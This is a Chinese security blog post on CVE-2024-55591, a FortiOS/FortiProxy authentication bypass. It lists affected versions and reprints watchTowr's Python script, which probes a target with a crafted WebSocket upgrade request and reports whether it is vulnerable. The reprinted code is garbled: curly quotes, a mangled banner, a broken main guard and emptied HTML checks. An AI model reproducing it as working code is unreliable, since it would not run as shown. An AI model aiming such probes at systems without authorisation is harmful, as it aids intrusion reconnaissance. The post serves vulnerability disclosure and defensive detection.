CVE-2024-55591|FortiOS和FortiProxy身份认证绕过漏洞(POC)

发布于 作者:

CVE-2024-55591|FortiOS和FortiProxy身份认证绕过漏洞(POC)

alicy 信安百科 2025-01-18 10:00

0x00 前言

FortiOS是美国飞塔(Fortinet)公司开发的一套专用于FortiGate网络安全平台上的安全操作系统,FortiOS本身就具有多种功能,防火墙、IPSec VPN、SSL-VPN、IPS、防病毒、Web过滤、反垃圾邮件和应用控制(即时通讯和P2P),以及带宽控制。

FortiProxy是Fortinet推出的一款高性能代理产品,它结合了Web过滤、DNS过滤、DLP、反病毒、入侵防御和高级威胁保护等多种检测技术,以保护用户免受网络攻击。

0x01 漏洞描述

未经身份验证的远程攻击者可以通过向 Node.js websocket 模块发送特制请求,成功利用此漏洞可使攻击者获得超级管理员权限。

0x02 CVE编号

CVE-2024-55591

0x03 影响版本

*“`
7.0.0 <= FortiOS 7.0. <= 7.0.16
7.0.0 <= FortiProxy 7.0. <= 7.0.19
7.2.0 <= FortiProxy 7.2. <= 7.2.12


****  
**0x04 漏洞详情**  


POC:  


https://github.com/watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591

import requests
import random
from uuid import uuid4
from datetime import datetime, timedelta
import argparse

banner = “””\
             __         ___  __                   
     __  _   /  | _ |  |\    _\  _  ________ 
     \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \  __ \
      \     / / __ \|  | \  \\|   Y  |    |(  <> \     / |  | \\n       \/\_/ (  ||  \\\_  |___||  | \\  / \\/\_/  |__|   
                  \\          \\     \\                              

CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) vulnerable detection by watchTowr

– Sonny , watchTowr ([email protected])
          – Aliz Hammond, watchTowr ([email protected])

CVEs: [CVE-2024-55591]
“””

def generate_random_suffix(length=6):
    “””Generate a random lowercase suffix.”””
    return ”.join(random.choice(‘abcdefghijklmnopqrstuvwxyz’) for _ in range(length))

def perform_web_interaction(target, port):
    “””
    Perform a two-step web interaction with specific parameters.

Args:
        target (str): Target IP address
        port (int): Target port

Returns:
        tuple: Results of the two requests
    “””
    # Construct base URL
    base_url = f”https://{target}:{port}”

# Generate random suffix
    random_suffix = generate_random_suffix()

# Disable SSL verification warnings
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# First request – login-like endpoint
    first_url = f”{base_url}/login?redir=/ng”
    first_response = requests.get(first_url, verify=False, timeout=10)

# Second request – endpoint with random suffix
    second_url = f”{base_url}/watchTowr-{random_suffix}”
    second_headers = {
        ‘Sec-WebSocket-Version’: ’13’,
        ‘Sec-WebSocket-Key’: ‘thFz/fKwzu5wDEy0XO3fcw==’,
        ‘Connection’: ‘keep-alive, Upgrade’,
        ‘Upgrade’: ‘websocket’
    }
    second_response = requests.get(second_url, headers=second_headers, verify=False, timeout=10)

return first_response, second_response

def validate_interaction_conditions(first_response, second_response):
    “””
    Validate specific conditions for the web interaction.

Args:
        first_response (requests.Response): First HTTP response
        second_response (requests.Response): Second HTTP response

Returns:
        bool: Whether all conditions are met
    “””
    try:
        # Check status codes
        status_code_1_check = first_response.status_code == 200
        status_code_2_check = second_response.status_code == 101

# Check body contents for first response
        html_main_app_check = ‘‘ in first_response.text
        f_icon_warning_check = ‘<f-icon class=”fa-warning’ in first_response.text
        f_icon_closing_check = ‘‘ in first_response.text

body_checks = html_main_app_check and f_icon_warning_check and f_icon_closing_check

# Check for specific header marker
        header_marker_check = any(‘APSCOOKIE_’ in str(header) for header in first_response.headers.values())

# Check connection upgrade for second response
        connection_upgrade_check = ‘Upgrade’ in second_response.headers.get(‘Connection’, ”)

# Print detailed information about first response matchers
        if not html_main_app_check:
            print(“[!] Target is not a FortiOS Management Interface”)
            exit()

if not f_icon_warning_check:
            print(“[!] ‘<f-icon class=\”fa-warning\”‘ not found in response”)

# Combine all checks
        return all([
            status_code_1_check,
            status_code_2_check,
            body_checks,
            header_marker_check,
            connection_upgrade_check
        ])
    except Exception as e:
        print(f”[!] Error during validation: {e}”)
        return False

def main():
    “””
    Main function to run the web interaction checks.
    “””
    print(banner)

parser = argparse.ArgumentParser(description=’CVE-2024-55591 Detection Tool’)
    parser.add_argument(‘–target’, ‘-t’, type=str, help=’IP address of the target’, required=True)
    parser.add_argument(‘–port’, ‘-p’, type=int, help=’Port of the target’, required=False, default=443)
    args = parser.parse_args()

try:
        print(f”[*] Targeting: https://{args.target}:{args.port}”)
        first_response, second_response = perform_web_interaction(args.target, args.port)

result = validate_interaction_conditions(first_response, second_response)

if result:
            print(“[!] VULNERABLE: All conditions were met”)
        else:
            print(“[*] NOT VULNERABLE: Conditions were not satisfied”)

except requests.RequestException as e:
        print(f”[!] Request error: {e}”)
    except Exception as e:
        print(f”[!] Unexpected error: {e}”)

if name == “main“:
    main()
“`

0x05 参考链接

https://fortiguard.fortinet.com/psirt/FG-IR-24-535

推荐阅读:

CVE-2024-47575|Fortinet FortiManager身份验证不当漏洞

CVE-2024-21762|Fortinet FortiOS & FortiProxy越界写入漏洞

Fortinet FortiOS sslvpnd远程代码执行漏洞

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持

!!!

本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。